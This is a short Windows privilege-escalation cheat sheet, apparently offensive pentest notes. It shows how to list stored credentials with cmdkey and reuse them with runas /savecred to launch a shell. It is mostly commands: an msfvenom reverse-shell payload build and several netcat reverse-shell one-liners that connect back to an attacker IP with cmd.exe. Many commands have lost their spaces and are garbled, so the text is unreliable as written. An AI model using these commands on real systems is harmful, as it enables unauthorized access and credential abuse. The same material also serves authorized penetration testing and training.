Runas which allows us to run a program as a different user. Runas can be used with local or domain accounts as long as the user has the ability to log on to the system.
cmdkey/list# List stored Creds on the machinewhererunas.exe# If we find or have the password# Example Stores Creds:Currentlystoredcredentials:Target:Domain:interactive=WORKGROUP\AdministratorType:DomainPasswordUser:WORKGROUP\Administrator
# Transfer msfvenommsfvenom-pwindows/x64/shell_reverse_tcpLHOST=<IP>LPORT=<PORT>-fexe>shell.exe# Using the above Stored Creds:runas/savecred/user:<USERfoundfromcmdkeycommandabove>"shell.exe"# Change path belowC:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
# If the above doesn't workrunas/user:administratorcmd# Try this or below to get the reverse shellrunas/user:administrator"nc.exe -e cmd.exe <IP> 443"# If the above doesn't work, try RunasCs